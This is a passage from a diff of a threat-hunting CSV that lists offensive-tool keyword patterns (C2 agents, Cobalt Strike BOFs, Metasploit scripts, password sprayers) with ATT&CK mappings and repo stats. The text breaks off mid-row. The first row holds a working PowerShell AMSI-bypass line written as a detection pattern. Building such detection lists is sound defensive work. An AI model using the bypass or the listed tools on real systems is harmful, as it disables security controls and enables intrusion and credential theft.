"*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assembly_inject -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*--assemblyargs AntiVirus AppLocker*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*--assemblyargs AntiVirus AppLocker*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*Assets/solution/dllmain.cpp*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*AssmblyLoader*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*AsStrongAsFuck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*AsStrongAsFuck.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*async_webshell-all.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*AsyncRAT/DCRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*AsStrongAsFuck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*AsStrongAsFuck.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*async_webshell-all.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*AsyncRAT/DCRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*asyncssh_commander.py *","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*asyncssh_commander.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Athena.Forwarders.SMB*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*athena/agent_code/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*AthenaPlugins.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Athena.Forwarders.SMB*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*athena/agent_code/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*AthenaPlugins.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*AtlasC2*APIModels*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*Client*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*implant*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" @@ -7361,9 +7506,9 @@ "*AtlasC2b.exe*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2b.sln*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasImplant.yar*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" -"*AtlasReaper.exe*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" -"*AtlasReaper-main*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" -"*atmail2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AtlasReaper.exe*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*AtlasReaper-main*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*atmail2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*atomizer imap *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer lync *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer owa *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" @@ -7393,15 +7538,15 @@ "*Augustus-main.zip*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*ausecwa/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*auth/cc2_ssh.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*auto_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*auto_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*auto_exploit_blank_password*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*auto_pass_the_hash.*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*auto_pass_the_hash.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*auto_target_linux.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*auto_target_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*autobloody -*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*autobloody.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*autobloody-main*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*auto_pass_the_hash.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_linux.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*autobloody -*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - 